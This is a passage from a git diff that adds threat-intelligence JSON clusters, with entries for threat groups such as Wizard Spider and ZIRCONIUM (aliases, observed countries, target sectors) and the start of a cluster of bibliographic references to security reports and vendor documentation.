Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).[[401 TRG Winnti Umbrella May 2018](https://app.tidalcyber.com/references/e3f1f2e4-dc1c-4d9c-925d-47013f44a69f)]", + "meta": { + "country": "CN", + "group_attack_id": "G0044", + "observed_countries": [ + "BY", + "BR", + "CN", + "DE", + "IN", + "ID", + "JP", + "KR", + "PE", + "PH", + "RU", + "TW", + "TH", + "US", + "VN" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Entertainment" + ] + }, + "related": [ + { + "dest-uuid": "9c124874-042d-48cd-b72b-ccdc51ecbbd6", + "type": "similar" + }, + { + "dest-uuid": "453f7dbf-bde7-4cf3-af5d-a6ac10335980", + "type": "similar" + } + ], + "uuid": "6932662a-53a7-4e43-877f-6e940e2d744b", + "value": "Winnti Group" + }, + { + "description": "[WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) is a threat group that has been active since at least August 2018. [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.[[Lab52 WIRTE Apr 2019](https://app.tidalcyber.com/references/884b675e-390c-4f6d-8cb7-5d97d84115e5)][[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]", + "meta": { + "group_attack_id": "G0090", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Financial Services", + "Government", + "Legal", + "Technology" + ] + }, + "related": [], + "uuid": "73da066d-b25f-45ba-862b-1a69228c6baa", + "value": "WIRTE" + }, + { + "description": "[[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]", + "meta": { + "id": "1c33c01b-e230-495e-9dc2-6b0208684b74" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "similar" + } + ], + "uuid": "1a9f2244-d35f-45d1-8f53-d1421498006d", + "value": "TEMP.MixMaster" + }, + { + "description": "[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)][[CrowdStrike Grim Spider May 2019](https://app.tidalcyber.com/references/103f2b78-81ed-4096-a67a-dedaffd67e9b)]", + "meta": { + "id": "40656576-ae67-4adf-8478-586f7a8180d7" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "similar" + } + ], + "uuid": "2924354f-bbaa-4c1b-8af0-a78976b1eff2", + "value": "Grim Spider" + }, + { + "description": "[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]", + "meta": { + "id": "17d304e9-9794-48a5-8297-7543199aa80f" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "similar" + } + ], + "uuid": "e0313186-a5f5-4bb0-94a0-b2b5d496bbc6", + "value": "UNC1878" + }, + { + "description": "[[Mandiant FIN12 Oct 2021](https://app.tidalcyber.com/references/4514d7cc-b999-5711-a398-d90e5d3570f2)]", + "meta": { + "id": "77d687c7-fe01-5fd5-9fa5-8c346f92b9d2" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "similar" + } + ], + "uuid": "91e61805-508f-536c-8e8e-89a5a24ae511", + "value": "FIN12" + }, + { + "description": "[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]", + "meta": { + "id": "b59c07e6-61eb-5c06-8816-a6606c4767a2" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "similar" + } + ], + "uuid": "c521ebb3-4303-5fef-a1fb-bd0e9f6a79a7", + "value": "GOLD BLACKBURN" + }, + { + "description": "[[IBM X-Force ITG23 Oct 2021](https://app.tidalcyber.com/references/d796e773-7335-549f-a79b-a2961f85a8ec)]", + "meta": { + "id": "be36bc98-f462-53fb-9097-80e7a2dec21b" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "similar" + } + ], + "uuid": "e03d13ed-35ac-59e3-afa0-b06cdf5eb534", + "value": "ITG23" + }, + { + "description": "[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]", + "meta": { + "id": "e2e61a31-7c55-5633-9b2b-4a67595f3903" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "similar" + } + ], + "uuid": "c049da64-915b-58ee-abf1-9d485159d2e0", + "value": "Periwinkle Tempest" + }, + { + "description": "[Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) since at least 2016. [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)][[DHS/CISA Ransomware Targeting Healthcare October 2020](https://app.tidalcyber.com/references/984e86e6-32e4-493c-8172-3d29de4720cc)][[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]", + "meta": { + "country": "RU", + "group_attack_id": "G0102", + "observed_countries": [ + "AU", + "BE", + "CA", + "DO", + "FR", + "DE", + "IT", + "JP", + "MX", + "NL", + "NZ", + "NO", + "SG", + "ES", + "CH", + "TW", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Aerospace", + "Agriculture", + "Automotive", + "Chemical", + "Education", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Hospitality Leisure", + "Insurance", + "Legal", + "Manufacturing", + "Media", + "NGOs", + "Non Profit", + "Pharmaceuticals", + "Retail", + "Technology", + "Telecommunications", + "Transportation", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "1a9f2244-d35f-45d1-8f53-d1421498006d", + "type": "similar" + }, + { + "dest-uuid": "2924354f-bbaa-4c1b-8af0-a78976b1eff2", + "type": "similar" + }, + { + "dest-uuid": "e0313186-a5f5-4bb0-94a0-b2b5d496bbc6", + "type": "similar" + }, + { + "dest-uuid": "91e61805-508f-536c-8e8e-89a5a24ae511", + "type": "similar" + }, + { + "dest-uuid": "c521ebb3-4303-5fef-a1fb-bd0e9f6a79a7", + "type": "similar" + }, + { + "dest-uuid": "e03d13ed-35ac-59e3-afa0-b06cdf5eb534", + "type": "similar" + }, + { + "dest-uuid": "c049da64-915b-58ee-abf1-9d485159d2e0", + "type": "similar" + } + ], + "uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "value": "Wizard Spider" + }, + { + "description": "[[Check Point APT31 February 2021](https://app.tidalcyber.com/references/84ac99ef-106f-44e9-97f0-3eda90570932)]", + "meta": { + "id": "dfb489dd-7b04-4d5a-b3ad-a1e801ade5ca" + }, + "related": [ + { + "dest-uuid": "5e34409e-2f55-4384-b519-80747d02394c", + "type": "similar" + } + ], + "uuid": "f17739da-dd35-4e1e-ab48-e27d9cd08caf", + "value": "APT31" + }, + { + "description": "[ZIRCONIUM](https://app.tidalcyber.com/groups/5e34409e-2f55-4384-b519-80747d02394c) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.[[Microsoft Targeting Elections September 2020](https://app.tidalcyber.com/references/1d7070fd-01be-4776-bb21-13368a6173b1)][[Check Point APT31 February 2021](https://app.tidalcyber.com/references/84ac99ef-106f-44e9-97f0-3eda90570932)]", + "meta": { + "country": "CN", + "group_attack_id": "G0128", + "observed_countries": [ + "BY", + "CA", + "FI", + "FR", + "MN", + "NO", + "RU", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Construction", + "Defense", + "Education", + "Financial Services", + "Government", + "High Tech", + "Insurance", + "Media", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "f17739da-dd35-4e1e-ab48-e27d9cd08caf", + "type": "similar" + } + ], + "uuid": "5e34409e-2f55-4384-b519-80747d02394c", + "value": "ZIRCONIUM" + } + ] +} diff --git a/clusters/tidal-references.json b/clusters/tidal-references.json new file mode 100644 index 0000000..eaa2bc8 --- /dev/null +++ b/clusters/tidal-references.json @@ -0,0 +1,57460 @@ +{ + "authors": "Tidal", + "category": "References", + "description": "Tidal References Cluster", + "name": "Tidal References", + "source": "Tidal", + "type": "references", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "values": [ + { + "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-04-30T00:00:00Z", + "refs": [ + "https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/" + ], + "source": "MITRE", + "title": "10 of the Best Open Source Threat Intelligence Feeds" + }, + "related": [], + "uuid": "088f2cbd-cce1-477f-9ffb-319477d74b69", + "value": "D3Secutrity CTI Feeds" + }, + { + "description": "Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.", + "meta": { + "date_accessed": "2020-03-29T00:00:00Z", + "date_published": "2018-04-19T00:00:00Z", + "refs": [ + "https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/" + ], + "source": "MITRE", + "title": "12 Critical Linux Log Files You Must be Monitoring" + }, + "related": [], + "uuid": "aa25e385-802c-4f04-81bb-bb7d1a7599ec", + "value": "Linux Logs" + }, + { + "description": "Sutherland, S. (2014, September 9). 15 Ways to Bypass the PowerShell Execution Policy. Retrieved July 23, 2015.", + "meta": { + "date_accessed": "2015-07-23T00:00:00Z", + "date_published": "2014-09-09T00:00:00Z", + "refs": [ + "https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/" + ], + "source": "MITRE", + "title": "15 Ways to Bypass the PowerShell Execution Policy" + }, + "related": [], + "uuid": "0ee90db4-f21c-4c68-bd35-aa6c5edd3b4e", + "value": "Netspi PowerShell Execution Policy Bypass" + }, + { + "description": "DANIEL KAPELLMANN ZAFRA, COREY HIDELBRANDT, NATHAN BRUBAKER, KEITH LUNDEN. (2022, January 31). 1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2022-01-31T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs" + ], + "source": "MITRE", + "title": "1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information" + }, + "related": [], + "uuid": "aecc3ffb-c524-5ad9-b621-7228f53e27c3", + "value": "Mandiant-leaks" + }, + { + "description": "Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2017-08-08T00:00:00Z", + "refs": [ + "https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf" + ], + "source": "MITRE", + "title": "1Windows Credentials: Attack, Mitigation, Defense" + }, + "related": [], + "uuid": "2ddae0c9-910c-4c1a-b524-de3a58dbba13", + "value": "Tilbury Windows Credentials" + }, + { + "description": "Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.", + "meta": { + "date_accessed": "2019-04-10T00:00:00Z", + "date_published": "2011-09-13T00:00:00Z", + "refs": [ + "https://cwe.mitre.org/top25/index.html" + ], + "source": "MITRE", + "title": "2011 CWE/SANS Top 25 Most Dangerous Software Errors" + }, + "related": [], + "uuid": "d8ee8b1f-c18d-48f3-9758-6860cd31c3e3", + "value": "CWE top 25" + }, + { + "description": "CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2016-01-01T00:00:00Z", + "refs": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf" + ], + "source": "MITRE", + "title": "2015 Global Threat Report" + }, + "related": [], + "uuid": "50d467da-286b-45f3-8d5a-e9d8632f7bf1", + "value": "CrowdStrike 2015 Global Threat Report" + }, + { + "description": "Bit9 + Carbon Black Threat Research Team. (2015). 2015: The Most Prolific Year in History for OS X Malware. Retrieved July 8, 2017.", + "meta": { + "date_accessed": "2017-07-08T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf" + ], + "source": "MITRE", + "title": "2015: The Most Prolific Year in History for OS X Malware" + }, + "related": [], + "uuid": "74b0f1a9-5822-4dcf-9a92-9a6df0b4db1e", + "value": "Prolific OSX Malware History" + }, + { + "description": "CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021.", + "meta": { + "date_accessed": "2021-02-10T00:00:00Z", + "date_published": "2019-06-04T00:00:00Z", + "refs": [ + "https://security.web.cern.ch/advisories/windigo/windigo.shtml" + ], + "source": "MITRE", + "title": "2019/06/04 Advisory: Windigo attacks" + }, + "related": [], + "uuid": "e9f1289f-a32e-441c-8787-cb32a26216d1", + "value": "CERN Windigo June 2019" + }, + { + "description": "CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2019-01-01T00:00:00Z", + "refs": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2019GlobalThreatReport.pdf" + ], + "source": "MITRE", + "title": "2019 Global Threat Report" + }, + "related": [], + "uuid": "d6aa917e-baee-4379-8e69-a04b9aa5192a", + "value": "CrowdStrike GTR 2019" + }, + { + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "meta": { + "date_accessed": "2020-12-11T00:00:00Z", + "date_published": "2020-03-02T00:00:00Z", + "refs": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "source": "MITRE", + "title": "2020 Global Threat Report" + }, + "related": [], + "uuid": "a2325ace-e5a1-458d-80c1-5037bd7fa727", + "value": "Crowdstrike GTR2020 Mar 2020" + }, + { + "description": "Insikt Group. (2022, January 18). 2021 Adversary Infrastructure Report. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2022-01-18T00:00:00Z", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf" + ], + "source": "MITRE", + "title": "2021 Adversary Infrastructure Report" + }, + "related": [], + "uuid": "d509e6f2-c317-4483-a51e-ad15a78a12c0", + "value": "RecordedFuture 2021 Ad Infra" + }, + { + "description": "Red Canary. (2021, March 31). 2021 Threat Detection Report. Retrieved August 31, 2021.", + "meta": { + "date_accessed": "2021-08-31T00:00:00Z", + "date_published": "2021-03-31T00:00:00Z", + "refs": [ + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf?mkt_tok=MDAzLVlSVS0zMTQAAAF_PIlmhNTaG2McG4X_foM-cIr20UfyB12MIQ10W0HbtMRwxGOJaD0Xj6CRTNg_S-8KniRxtf9xzhz_ACvm_TpbJAIgWCV8yIsFgbhb8cuaZA" + ], + "source": "MITRE", + "title": "2021 Threat Detection Report" + }, + "related": [], + "uuid": "83b906fc-ac2a-4f49-b87e-31f046e95fb7", + "value": "Red Canary 2021 Threat Detection Report March 2021" + }, + { + "description": "Australian Cyber Security Centre. (2022, April 14). 2022-004: ACSC Ransomware Profile - ALPHV (aka BlackCat). Retrieved December 20, 2022.", + "meta": { + "date_accessed": "2022-12-20T00:00:00Z", + "date_published": "2022-04-14T00:00:00Z", + "refs": [ + "https://www.cyber.gov.au/about-us/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat" + ], + "source": "MITRE", + "title": "2022-004: ACSC Ransomware Profile - ALPHV (aka BlackCat)" + }, + "related": [], + "uuid": "3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d", + "value": "ACSC BlackCat Apr 2022" + }, + { + "description": "IC3. (2022). 2022 Internet Crime Report. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2022-01-01T00:00:00Z", + "refs": [ + "https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf" + ], + "source": "MITRE", + "title": "2022 Internet Crime Report" + }, + "related": [], + "uuid": "ef30c4eb-3da3-5c7b-a304-188acd2f7ebc", + "value": "Internet crime report 2022" + }, + { + "description": "Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "refs": [ + "https://redcanary.com/threat-detection-report/techniques/powershell/" + ], + "source": "MITRE", + "title": "2022 Threat Detection Report: PowerShell" + }, + "related": [], + "uuid": "0f154aa6-8c9d-5bfc-a3c4-5f3e1420f55f", + "value": "RC PowerShell" + }, + { + "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", + "meta": { + "date_accessed": "2021-08-23T00:00:00Z", + "date_published": "2021-02-16T00:00:00Z", + "refs": [ + "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + ], + "source": "MITRE", + "title": "20 Common Tools & Techniques Used by macOS Threat Actors & Malware" + }, + "related": [], + "uuid": "3ee99ff4-daf4-4776-9d94-f7cf193c2b0c", + "value": "20 macOS Common Tools and Techniques" + }, + { + "description": "Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/cc422924.aspx" + ], + "source": "MITRE", + "title": "2.2.1.1.4 Password Encryption" + }, + "related": [], + "uuid": "24d8847b-d5de-4513-a55f-62c805dfa1dc", + "value": "Microsoft GPP Key" + }, + { + "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.", + "meta": { + "date_accessed": "2020-09-18T00:00:00Z", + "date_published": "2020-02-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239" + ], + "source": "MITRE", + "title": "2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information" + }, + "related": [], + "uuid": "70c75ee4-4ba4-4124-8001-0fadb49a5ac6", + "value": "Microsoft _VBA_PROJECT Stream" + }, + { + "description": "Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2021-04-06T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1" + ], + "source": "MITRE", + "title": "2.5 ExtraData" + }, + "related": [], + "uuid": "73ba4e07-cfbd-4b23-b52a-1ebbd7cc0fe4", + "value": "Microsoft Learn" + }, + { + "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.", + "meta": { + "date_accessed": "2018-08-19T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110" + ], + "source": "MITRE", + "title": "2a8efbfadd798f6111340f7c1c956bee.dll" + }, + "related": [], + "uuid": "5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4", + "value": "Hybrid Analysis Icacls2 May 2018" + }, + { + "description": "Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.", + "meta": { + "date_accessed": "2020-08-03T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry" + ], + "source": "MITRE", + "title": "32-bit and 64-bit Application Data in the Registry" + }, + "related": [], + "uuid": "cbc14af8-f0d9-46c9-ae2c-d93d706ac84e", + "value": "Microsoft Wow6432Node 2018" + }, + { + "description": "Department of Justice. (2021). 3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and" + ], + "source": "MITRE", + "title": "3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe" + }, + "related": [], + "uuid": "c50d2a5b-1d44-5f18-aaff-4be9f6d3f3ac", + "value": "DOJ-DPRK Heist" + }, + { + "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", + "meta": { + "date_accessed": "2018-10-02T00:00:00Z", + "date_published": "2014-12-14T00:00:00Z", + "refs": [ + "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html" + ], + "source": "MITRE", + "title": "3 tools to check your hard drive's health and make sure it's not already dying on you" + }, + "related": [], + "uuid": "e48fab76-7e38-420e-b69b-709f37bde847", + "value": "ITWorld Hard Disk Health Dec 2014" + }, + { + "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.", + "meta": { + "date_accessed": "2018-08-09T00:00:00Z", + "date_published": "2017-04-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657" + ], + "source": "MITRE", + "title": "4657(S): A registry value was modified" + }, + "related": [], + "uuid": "ee681893-edd6-46c7-bb11-38fc24eef899", + "value": "Microsoft 4657 APR 2017" + }, + { + "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.", + "meta": { + "date_accessed": "2018-08-07T00:00:00Z", + "date_published": "2017-04-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697" + ], + "source": "MITRE", + "title": "4697(S): A service was installed in the system" + }, + "related": [], + "uuid": "17473dc7-39cd-4c90-85cb-05d4c1364fff", + "value": "Microsoft 4697 APR 2017" + }, + { + "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.", + "meta": { + "date_accessed": "2017-06-30T00:00:00Z", + "date_published": "2017-04-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720" + ], + "source": "MITRE", + "title": "4720(S): A user account was created" + }, + "related": [], + "uuid": "01e2068b-83bc-4479-8fc9-dfaafdbf272b", + "value": "Microsoft User Creation Event" + }, + { + "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.", + "meta": { + "date_accessed": "2017-06-30T00:00:00Z", + "date_published": "2017-04-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738" + ], + "source": "MITRE", + "title": "4738(S): A user account was changed" + }, + "related": [], + "uuid": "fb4164f9-1e03-43f1-8143-179c9f08dff2", + "value": "Microsoft User Modified Event" + }, + { + "description": "Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020.", + "meta": { + "date_accessed": "2020-08-24T00:00:00Z", + "date_published": "2017-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768" + ], + "source": "MITRE", + "title": "4768(S, F): A Kerberos authentication ticket (TGT) was requested" + }, + "related": [], + "uuid": "19237af4-e535-4059-a8a9-63280cdf4722", + "value": "Microsoft 4768 TGT 2017" + }, + { + "description": "HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2017-10-11T00:00:00Z", + "refs": [ + "https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/" + ], + "source": "MITRE", + "title": "47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket" + }, + "related": [], + "uuid": "b0fbf593-4aeb-4167-814b-ed3d4479ded0", + "value": "HIPAA Journal S3 Breach, 2017" + }, + { + "description": "Michael Osakwe. (2020, November 18). 4 SaaS and Slack Security Risks to Consider. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2020-11-18T00:00:00Z", + "refs": [ + "https://www.nightfall.ai/blog/saas-slack-security-risks-2020" + ], + "source": "MITRE", + "title": "4 SaaS and Slack Security Risks to Consider" + }, + "related": [], + "uuid": "4332430a-0dec-5942-88ce-21f6d02cc9a9", + "value": "Slack Security Risks" + }, + { + "description": "Michael Swanagan. (2020, October 24). 7 Data Loss Prevention Best Practices & Strategies. Retrieved August 30, 2021.", + "meta": { + "date_accessed": "2021-08-30T00:00:00Z", + "date_published": "2020-10-24T00:00:00Z", + "refs": [ + "https://purplesec.us/data-loss-prevention/" + ], + "source": "MITRE", + "title": "7 Data Loss Prevention Best Practices & Strategies" + }, + "related": [], + "uuid": "b7d786db-c50e-4d1f-947e-205e8eefa2da", + "value": "PurpleSec Data Loss Prevention" + }, + { + "description": "I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.", + "meta": { + "date_accessed": "2020-02-20T00:00:00Z", + "date_published": "2019-01-01T00:00:00Z", + "refs": [ + "https://www.7-zip.org/" + ], + "source": "MITRE", + "title": "7-Zip" + }, + "related": [], + "uuid": "fc1396d2-1ffd-4fd9-ba60-3f6e0a9dfffb", + "value": "7zip Homepage" + }, + { + "description": "Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018.", + "meta": { + "date_accessed": "2018-02-20T00:00:00Z", + "date_published": "2016-08-30T00:00:00Z", + "refs": [ + "https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ" + ], + "source": "MITRE", + "title": "“9002 RAT” -- a second building on the left" + }, + "related": [], + "uuid": "a4d6bdd1-e70c-491b-a569-72708095c809", + "value": "MicroFocus 9002 Aug 2016" + }, + { + "description": "CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.", + "meta": { + "date_accessed": "2021-08-12T00:00:00Z", + "date_published": "2021-07-19T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-200a" + ], + "source": "MITRE, Tidal Cyber", + "title": "(AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department" + }, + "related": [], + "uuid": "3a2dbd8b-54e3-406a-b77c-b6fae5541b6d", + "value": "CISA AA21-200A APT40 July 2021" + }, + { + "description": "Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 1, 2022.", + "meta": { + "date_accessed": "2022-02-01T00:00:00Z", + "date_published": "2018-10-25T00:00:00Z", + "refs": [ + "https://o365blog.com/aadinternals/" + ], + "source": "MITRE", + "title": "AADInternals" + }, + "related": [], + "uuid": "d6faadde-690d-44d1-b1aa-0991a5374604", + "value": "AADInternals" + }, + { + "description": "Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022.", + "meta": { + "date_accessed": "2022-02-18T00:00:00Z", + "date_published": "2018-10-25T00:00:00Z", + "refs": [ + "https://o365blog.com/aadinternals" + ], + "source": "MITRE", + "title": "AADInternals Documentation" + }, + "related": [], + "uuid": "320231a1-4dbe-4eaa-b14d-48de738ba697", + "value": "AADInternals Documentation" + }, + { + "description": "Dr. Nestori Syynimaa. (2021, December 13). AADInternals. Retrieved February 1, 2022.", + "meta": { + "date_accessed": "2022-02-01T00:00:00Z", + "date_published": "2021-12-13T00:00:00Z", + "refs": [ + "https://github.com/Gerenios/AADInternals" + ], + "source": "MITRE", + "title": "AADInternals Github" + }, + "related": [], + "uuid": "643d3947-c0ec-47c4-bb58-5e546084433c", + "value": "AADInternals Github" + }, + { + "description": "Savelesky, K., et al. (2019, July 23). ABADBABE 8BADFOOD: Discovering BADHATCH and a Detailed Look at FIN8's Tooling. Retrieved September 8, 2021.", + "meta": { + "date_accessed": "2021-09-08T00:00:00Z", + "date_published": 